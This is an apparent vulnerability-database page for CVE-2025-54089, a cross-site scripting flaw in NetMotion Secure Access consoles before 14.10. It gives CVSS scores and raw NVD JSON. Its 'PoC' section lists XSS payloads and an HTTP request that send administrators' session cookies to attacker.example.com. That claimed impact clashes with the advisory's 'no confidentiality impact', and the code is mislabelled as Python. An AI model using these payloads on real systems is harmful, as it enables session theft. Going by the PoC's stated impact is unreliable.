Security Vulnerability Report
中文
CVE-2025-54089 CVSS 3.4 LOW

CVE-2025-54089

Published: 2025-10-02 21:16:01
Last Modified: 2025-10-16 18:21:03
Source: [email protected]

Description

CVE-2025-54089 is a cross-site scripting vulnerability in versions of secure access prior to 14.10. Attackers with administrative access to the console can interfere with another administrator’s access to the console. The attack complexity is low; there are no attack requirements. Privileges required to execute the attack are high and the victim must actively participate in the attack sequence. There is no impact to confidentiality or availability, there is a low impact to integrity.

CVSS Details

CVSS Score
3.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:* - VULNERABLE
NetMotion Secure Access < 14.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-54089 PoC: NetMotion Secure Access Console XSS --> <!-- Attack scenario: An authenticated admin injects malicious script via console input fields --> <!-- Example 1: Malicious payload injected into a configuration field --> <script> // Steal session cookie of the victim administrator var attackerServer = "https://attacker.example.com/collect"; var sessionData = document.cookie; var xhr = new XMLHttpRequest(); xhr.open("GET", attackerServer + "?cookie=" + encodeURIComponent(sessionData), true); xhr.send(); </script> <!-- Example 2: Using img tag for cookie exfiltration (works even when scripts are partially filtered) --> <img src=x onerror="fetch('https://attacker.example.com/log?data='+document.cookie)"> <!-- Example 3: SVG-based XSS payload for bypassing input sanitization --> <svg onload="var i=new Image();i.src='https://attacker.example.com/x?'+document.cookie;"> <!-- Example 4: Full exploitation scenario via HTTP request --> POST /console/api/config HTTP/1.1 Host: netmotion-console.target.com Content-Type: application/json Cookie: session=<attacker_session> { "configName": "<img src=x onerror=\"fetch('https://attacker.example.com/steal?c='+document.cookie)\">", "description": "Legitimate configuration description", "settings": {} } <!-- When victim admin views the configuration list, the payload fires and exfiltrates their session -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54089", "sourceIdentifier": "[email protected]", "published": "2025-10-02T21:16:00.860", "lastModified": "2025-10-16T18:21:03.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVE-2025-54089 is a cross-site scripting vulnerability in versions\nof secure access prior to 14.10. Attackers with administrative access to the\nconsole can interfere with another administrator’s access to the console. The\nattack complexity is low; there are no attack requirements. Privileges required\nto execute the attack are high and the victim must actively participate in the\nattack sequence. There is no impact to confidentiality or availability, there\nis a low impact to integrity."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.10", "matchCriteriaId": "A4C71B0A-C4A4-421F-A1B4-0CCD7FECEBF1"}]}]}], "references": [{"url": "https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2025-54089", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.